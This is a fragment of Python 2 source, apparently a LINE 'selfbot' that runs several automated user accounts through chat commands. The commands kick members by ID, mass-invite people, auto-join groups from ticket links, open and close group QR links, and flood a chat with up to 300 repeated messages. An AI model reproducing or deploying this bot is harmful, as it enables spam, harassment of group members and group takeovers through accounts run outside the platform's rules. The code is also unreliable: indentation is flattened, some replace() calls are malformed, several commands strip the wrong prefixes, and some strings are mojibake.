if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already")
ki.sendText(msg.to,"already")
kk.sendText(msg.to,"already")
kc.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"aded")
ki.sendText(msg.to,"aded")
kk.sendText(msg.to,"aded")
kc.sendText(msg.to,"aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["Key","help","Help"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["help1"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpgroup)
else:
cl.sendText(msg.to,Sett)
elif ("Gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif ("Red1 gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Red1 gn ","")
ki.updateGroup(X)
else:
ki.sendText(msg.to,"It can't be used besides the group.")
elif ("Red2 gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Red2 gn ","")
kk.updateGroup(X)
else:
kk.sendText(msg.to,"It can't be used besides the group.")
elif ("Red3 gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Red3 gn ","")
kc.updateGroup(X)
else:
kc.sendText(msg.to,"It can't be used besides the group.")
elif "Kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick ","")
random.choice(KAC).kickoutFromGroup(msg.to,[midd])
elif "Red1 kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Red1 kick ","")
ki.kickoutFromGroup(msg.to,[midd])
elif "Red2 kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Red2 kick ","")
kk.kickoutFromGroup(msg.to,[midd])
elif "Red3 kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Red3 kick ","")
kc.kickoutFromGroup(msg.to,[midd])
elif "Red4 kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Red4 kick ","")
ks.kickoutFromGroup(msg.to,[midd])
elif msg.text in ["invite","ดึง"]:
if msg.from_ in admin:
wait["ricoinvite"] = True
random.choice(KAC).sendText(msg.to,"ส่งคท.ด้วย 😉")
elif "Invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif "Red1 invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Red1 invite ","")
ki.findAndAddContactsByMid(midd)
ki.inviteIntoGroup(msg.to,[midd])
elif "Red2 invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Red2 invite ","")
kk.findAndAddContactsByMid(midd)
kk.inviteIntoGroup(msg.to,[midd])
elif "Red3 invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Red3 invite ","")
kc.findAndAddContactsByMid(midd)
kc.inviteIntoGroup(msg.to,[midd])
#--------------- SC Add Admin ---------
elif "Admin add @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"Admin Ditambahkan")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif "Admin remove @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff remove executing"
_name = msg.text.replace("Admin remove @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Admin Dihapus")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif msg.text in ["Adminlist","adminlist"]:
if admin == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"Tunggu...")
mc = "||Admin One Red Bot||\n=====================\n"
for mi_d in admin:
mc += "••>" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#--------------------------------------
#-------------- Add Friends ------------
elif "Bot Add @" in msg.text:
if msg.toType == 2:
if msg.from_ in owner:
print "[Command]Add executing"
_name = msg.text.replace("Bot Add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
ki.findAndAddContactsByMid(target)
kk.findAndAddContactsByMid(target)
kc.findAndAddContactsByMid(target)
ks.findAndAddContactsByMid(target)
except:
cl.sendText(msg.to,"Error")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
#-------------=SC AllBio=---------------- Ganti Bio Semua Bot Format => Allbio: SUKA SUKA KALIAN :D
elif "Allbio:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kk.getProfile()
profile.statusMessage = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kc.getProfile()
profile.statusMessage = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ks.getProfile()
profile.statusMessage = string
ks.updateProfile(profile)
cl.sendText(msg.to,"Bio berubah menjadi " + string + "")
#--------------=Finish=----------------
#--------------= SC Ganti nama Owner=--------------
elif "Myname:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Myname:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Name Menjadi : " + string + "")
#-------------- copy profile----------
elif "Red say: " in msg.text:
if msg.from_ in admin:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Red say: ")+str(txt[1])+" "+str(jmlh + " ","")
tulisan = jmlh * (teks+"\n")
#@reno.a.w
if txt[1] == "on":
if jmlh <= 300:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Kelebihan batas:v")
elif txt[1] == "off":
if jmlh <= 300:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Kelebihan batas :v")
#-----------------=Selesai=------------------
elif msg.text in ["Bot?"]: #Ngirim Semua Kontak Bot
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ks.sendMessage(msg)
elif msg.text in ["Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
random.choice(KAC).sendMessage(msg)
elif msg.text in ["Red1"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
elif msg.text in ["愛�プレゼント","Gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
random.choice(KAC).sendMessage(msg)
elif msg.text in ["愛�プレゼント","All gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
elif msg.text in ["Cancel","cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Red cancel","Bot cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
G = k3.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
k3.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
k3.sendText(msg.to,"No one is inviting")
else:
k3.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
k3.sendText(msg.to,"Can not be used outside the group")
else:
k3.sendText(msg.to,"Not for use less than group")
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["เปิดลิ้งค์","Open qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"QR Sudah Dibuka")
else:
random.choice(KAC).sendText(msg.to,"Sudah Terbuka Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
elif msg.text in ["Red1 เปิดลิ้งค์","Red1 open qr"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done Plak")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Red2 เปิดลิ้งค์","Red2 open qr"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = False
kk.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done Plak")
else:
ki.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Red3 เปิดลิ้งค์"," Red3 open qr"]:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = False
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Plak")
else:
kc.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
elif msg.text in ["ปิดลิ้งค์","Close qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
elif msg.text in ["Red1 ปิดลิ้งค์","Red1 close qr"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done Plak")
else:
ki.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Red2 ปิดลิ้งค์","Red2 close qr"]:
if msg.toType == 2:
X = kk.getGroup(msg.to)
X.preventJoinByTicket = True
kk.updateGroup(X)
if wait["lang"] == "JP":
kk.sendText(msg.to,"Done Plak")
else:
kk.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kk.sendText(msg.to,"Can not be used outside the group")
else:
kk.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Red3 ปิดลิ้งค์","Red3 close qr"]:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = True
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Plak")
else:
kc.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
elif "jointicket " in msg.text.lower():
rplace=msg.text.lower().replace("jointicket ")
if rplace == "on":
wait["atjointicket"]=True
elif rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
if wait["atjointicket"] == True:
group=cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.mid,ticket_id)
cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
elif "Info Group" == msg.text:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
QR = "Close"
else:
QR = "Open"
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + "[•]" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + "[•]" + gCreator + "\n\n[Group Status]\n" + "[•]Status QR =>" + QR + "\n\n[Group Picture]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nMembers:" + str(len(ginfo.members)) + "\nPending:" + sinvitee)
else:
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\n[Group Status]\nGroup Picture:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif "My mid" == msg.text:
if msg.from_ in admin:
random.choice(KAC).sendText(msg.to, msg.from_)
elif "Mid Bot" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
ks.sendText(msg.to,Dmid)
elif "Redsamuri" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,Smid)
elif "Red1" == msg.text:
if msg.from_ in admin:
ki.sendText(msg.to,mid)
elif "Red2" == msg.text:
if msg.from_ in admin:
kk.sendText(msg.to,Amid)
elif "Red3" == msg.text:
if msg.from_ in admin:
kc.sendText(msg.to,Bmid)
elif msg.text in ["Wkwkwk","Wkwk","Wk","wkwkwk","wkwk","wk"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hehehe","Hehe","He","hehehe","hehe","he"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Galau"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["You"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hadeuh"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Please"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Haaa"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Lol"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hmmm","Hmm","Hm","hmmm","hmm","hm"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Welcome"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["TL: "]:
if msg.from_ in admin:
tl_text = msg.text.replace("TL: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif msg.text in ["Bot1 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cn ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot2 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv1 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = ki.getProfile()
profile_B.displayName = string
ki.updateProfile(profile_B)
ki.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot3 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv2 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = kk.getProfile()
profile_B.displayName = string
kk.updateProfile(profile_B)
kk.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Mc "]:
if msg.from_ in admin:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
#elif msg.text in ["Joinn on","joinn on"]:
#if msg.from_ in admin:
#if wait["Protectjoin"] == True:
#if wait["lang"] == "JP":
#cl.sendText(msg.to,"Kick Joined Group On")
#else:
#cl.sendText(msg.to,"Done")
#else:
#wait["Protectjoin"] = True
#if wait["lang"] == "JP":
#cl.sendText(msg.to,"Kick Joined Group On")
#else:
#cl.sendText(msg.to,"done")
#elif msg.text in ["Joinn off","joinn off"]:
#if msg.from_ in admin:
#if wait["Protectjoin"] == False:
#if wait["lang"] == "JP":
#cl.sendText(msg.to,"kick Joined Group Off")
#else:
#cl.sendText(msg.to,"done")
#else:
#wait["Protectjoin"] = False
#if wait["lang"] == "JP":
#cl.sendText(msg.to,"kick Joined Group Off")
#else:
#cl.sendText(msg.to,"done")
elif msg.text in ["Allprotect on","Red on"]:
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Kick Joined Group On")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Udah On")
else:
cl.sendText(msg.to,"Udah On")
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Invit On")
else:
cl.sendText(msg.to,"Invit on")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Invit On")
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Cancel On")
else:
cl.sendText(msg.to,"Cancel on")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Cancel On")
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect On")
else:
cl.sendText(msg.to,"Done")
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect On")
else:
cl.sendText(msg.to,"Done")
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Link On")
else:
cl.sendText(msg.to,"Link On")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Link On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Allprotect off","Red off"]:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group Off")
else:
cl.sendText(msg.to,"Kick Joined Gtoup Off�")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Udah Mati Gblk")
else:
cl.sendText(msg.to,"Udah Mati Gblk")
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Invite Off")
else:
cl.sendText(msg.to,"Invite OFF")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Invite Off")
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Cancel Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Cancel Off")
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Block Off")
else:
cl.sendText(msg.to,"done")
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Block Off")
else:
cl.sendText(msg.to,"done")
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel on","cancel on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel off","cancel off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr on","qr on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr off","qr off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact On","Contact on","contact on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact Off","Contact off","contact off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オン","Join on","Auto join on","自動å�ƒåŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オフ","Join off","Auto join off","自動å�ƒåŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Gcancel:"]:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒�。�时开请指定人数��")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "The group of people and below decided to automatically refuse invitation")
else:
